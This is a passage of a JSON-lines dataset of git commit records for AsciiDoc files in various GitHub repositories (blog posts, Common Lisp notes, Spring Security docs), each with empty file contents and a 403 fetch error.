I850e000a73b4e16087940b36fa66b4949c202bce\nSigned-off-by: Patrik Suzzi <b03bc6a6b804fee7604b4037c3296a84d81f84d0@gmail.com>","repos":"psuzzi\/asegno,psuzzi\/asegno,psuzzi\/asegno","old_file":"my.example\/my.example.asciidoc\/docsrc\/eclipse.wtp\/eclispe-wtp.adoc","new_file":"my.example\/my.example.asciidoc\/docsrc\/eclipse.wtp\/eclispe-wtp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psuzzi\/asegno.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6e2cd00a36f79475542817cdd23767a60fdd8fae","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94f439fd0ca34ca1f4918c53a525d7e0e7fce8b5","subject":"CL - unit testing","message":"CL - unit testing\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2b8f2fd16b9fef5128f8bbd794f5dceb140ae713","subject":"Explicitly use trivial-utf8","message":"Explicitly use trivial-utf8\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7561f5a2175b560b3d37c62f832e73101b6a0579","subject":"CL notes: Extracting basename\/filename","message":"CL notes: Extracting basename\/filename\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"17b78b34972a463cb65358744c87f952f6e188e9","subject":"Add note CL - running external program","message":"Add note CL - running external program\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7d5d1b390510ab7fedf6ceb6e38bc1ef072334fa","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75ebda49f92c3aaef29869ad48f82d8e5bd7cd17","subject":"Update 2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","message":"Update 2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","new_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f48671302fe2c37d75499f95bbdaad649a9d7031","subject":"CL note: Checking if a directory exists","message":"CL note: Checking if a directory exists\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"60cad8e7b4b9454868fc465db710c4cf1579f582","subject":"Note on symbol-value and symbol-function","message":"Note on symbol-value and symbol-function\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"03ae414cb6220262b388ea2da2e31f1492b4552d","subject":"added DEVELOPMENT.adoc","message":"added DEVELOPMENT.adoc\n","repos":"Petikoch\/jtrag","old_file":"DEVELOPMENT.adoc","new_file":"DEVELOPMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Petikoch\/jtrag.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52cf017c36b08d3b3979c795c261d67eec244b47","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e15dcf57f7550a764cbfa4ddd0beee3ea7632261","subject":"Update 2017-07-21-Learning-to-reconstruct.adoc","message":"Update 2017-07-21-Learning-to-reconstruct.adoc","repos":"adler-j\/adler-j.github.io,adler-j\/adler-j.github.io","old_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adler-j\/adler-j.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2deb722a1f16a3e691f2963a7b6b8a0a60608638","subject":"JavaDoc links in 5.5 Handling Logouts fixed (#3993)","message":"JavaDoc links in 5.5 Handling Logouts fixed (#3993)\n\nFixes gh-3992","repos":"pwheel\/spring-security,jgrandja\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,SanjayUser\/SpringSecurityPro,mdeinum\/spring-security,ollie314\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,mdeinum\/spring-security,thomasdarimont\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,pwheel\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,olezhuravlev\/spring-security,wkorando\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,jgrandja\/spring-security,ollie314\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,wkorando\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,olezhuravlev\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,kazuki43zoo\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0545d80d4df0dcb38be9a8f7a317b3fed6fb8c07","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47ac08f6b210807645f519562190029dc715e02b","subject":"Update 2016-05-31-Rinna-In-Pepper.adoc","message":"Update 2016-05-31-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcfe82f05a8045adf88e6d1661e5e518da987477","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d89884e1c7b9e579a5767539130e6c4d80ff88d7","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d0b44a58a497c83a681d56908f89fe79c43c03","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cec335556790106ea98eec2e591a142d878acce","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2f5b7e45ac2658da8d0908be1ef02febeb369b","subject":"Update knowledgebase proto link","message":"Update knowledgebase proto link","repos":"Onager\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts,joachimmetz\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e4932d40099c9d992305e2ee65135e54fbb260c","subject":"git: add 'better force push' howto","message":"git: add 'better force push' howto\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"git\/better-force-push.adoc","new_file":"git\/better-force-push.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d33f5acc02d47a46e166105a99b4cf5ff80dab80","subject":"y2b create post Ali-A's Gaming Setup \\u0026 Room Tour (Epic Setup)","message":"y2b create post Ali-A's Gaming Setup \\u0026 Room Tour (Epic Setup)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-28-AliAs-Gaming-Setup-u0026-Room-Tour-Epic-Setup.adoc","new_file":"_posts\/2013-02-28-AliAs-Gaming-Setup-u0026-Room-Tour-Epic-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46eb99d4540beb11df04a0403b02e2bfaedbb811","subject":"Renamed '_posts\/2020-06-11-how-i-use-meteor-elm-and-tailwindcss-together.adoc' to '_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc'","message":"Renamed '_posts\/2020-06-11-how-i-use-meteor-elm-and-tailwindcss-together.adoc' to '_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc","new_file":"_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03034bf0bb450162a444f0c927da9d68272fe8b2","subject":"Update conference-java-Conference-annotations-java-compte-rendu.adoc","message":"Update conference-java-Conference-annotations-java-compte-rendu.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/conference-java-Conference-annotations-java-compte-rendu.adoc","new_file":"_posts\/conference-java-Conference-annotations-java-compte-rendu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"580dd07c073d7aa1592b2aac2206f6e3cd673b26","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05c704acd007d18c98a0c1cba483934d18a99fbe","subject":"Update 2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","message":"Update 2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","new_file":"_posts\/2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ludolphus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de32f5026e12e859fc8eadfdb9ebc9230e0d6607","subject":"Update 2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","message":"Update 2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","new_file":"_posts\/2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c60d3992d10478d522707381ead37679d3b8e01a","subject":"y2b create post World's Thinnest iPhone Battery Case!","message":"y2b create post World's Thinnest iPhone Battery Case!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-13-Worlds-Thinnest-iPhone-Battery-Case.adoc","new_file":"_posts\/2016-06-13-Worlds-Thinnest-iPhone-Battery-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fc81e59569024537e96af002d14907c60ac892d","subject":"y2b create post Get The iPhone X Notch On Any Phone...","message":"y2b create post Get The iPhone X Notch On Any Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-20-Get-The-iPhone-X-Notch-On-Any-Phone.adoc","new_file":"_posts\/2017-09-20-Get-The-iPhone-X-Notch-On-Any-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b170581d2642321a2241da4ff513809a5544afa","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bf54282be291301b4bcc2b8f2f6376cbae5313d","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ece2ef071b58deaadc65c4081e70cf7aab7b45d5","subject":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","message":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","new_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce23004bdcae73a0ed5ef7ef78fb97d4cdea458c","subject":"Add master.adoc for documentation","message":"Add master.adoc for documentation\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/master.adoc","new_file":"documentation\/master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b56c7a376025e15df749dd4575df6af5f1671c2","subject":"added","message":"added\n","repos":"m-m-m\/mmm,m-m-m\/mmm","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/mmm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ba4a6f402b14bb11d544c2ced3c9b3633515d4e","subject":"y2b create post Twelve South MagicWand Unboxing \\u0026 Overview","message":"y2b create post Twelve South MagicWand Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-09-Twelve-South-MagicWand-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-03-09-Twelve-South-MagicWand-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1924f93f1001528ca5e4e25c85906d604ee3ee75","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5307425a66232f41289f124a776dc1896bd7d8fc","subject":"Update 2017-01-11-dnvod-filter-the-ad.adoc","message":"Update 2017-01-11-dnvod-filter-the-ad.adoc","repos":"xinmeng1\/note,xinmeng1\/note,xinmeng1\/note,xinmeng1\/note","old_file":"_posts\/2017-01-11-dnvod-filter-the-ad.adoc","new_file":"_posts\/2017-01-11-dnvod-filter-the-ad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xinmeng1\/note.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc15a6e08fac6c6445dfd5dac50102560f7b93a6","subject":"chore(ch2): id\u304c\u91cd\u8907\u3057\u305f\u306e\u3067\u4fee\u6b63","message":"chore(ch2): id\u304c\u91cd\u8907\u3057\u305f\u306e\u3067\u4fee\u6b63\n","repos":"xifeiwu\/promises-book,mzbac\/promises-book,liubin\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,cqricky\/promises-book,azu\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,liubin\/promises-book,wenber\/promises-book,cqricky\/promises-book,sunfurong\/promise,wenber\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,genie88\/promises-book,charlenopires\/promises-book,azu\/promises-book,genie88\/promises-book,liubin\/promises-book,dieface\/promises-book,purepennons\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,oToUC\/promises-book,mzbac\/promises-book,sunfurong\/promise","old_file":"Appendix-Glossary\/readme.adoc","new_file":"Appendix-Glossary\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"616949a5beb8239862c64406d333ef8b5aec5df0","subject":"Add getting cwd","message":"Add getting cwd\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"421cab232e2969408e8acae28acebd9745a01a15","subject":"Update 2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","message":"Update 2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","new_file":"_posts\/2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a562bd1e1df96d87eb27b3343d569237cc23cbd3","subject":"Update 2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","message":"Update 2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","new_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd101d2f3775ba6957903bebb545b4af76c29d8a","subject":"Update 2015-02-10-Test.adoc","message":"Update 2015-02-10-Test.adoc","repos":"dan-blanchard\/blog,dan-blanchard\/blog,dan-blanchard\/blog","old_file":"_posts\/2015-02-10-Test.adoc","new_file":"_posts\/2015-02-10-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dan-blanchard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f0fb7c46015902b279adb60ebc4ee18a49f03ac","subject":"Update 2017-01-27-Test.adoc","message":"Update 2017-01-27-Test.adoc","repos":"kreids\/kreids.github.io,kreids\/kreids.github.io,kreids\/kreids.github.io,kreids\/kreids.github.io","old_file":"_posts\/2017-01-27-Test.adoc","new_file":"_posts\/2017-01-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 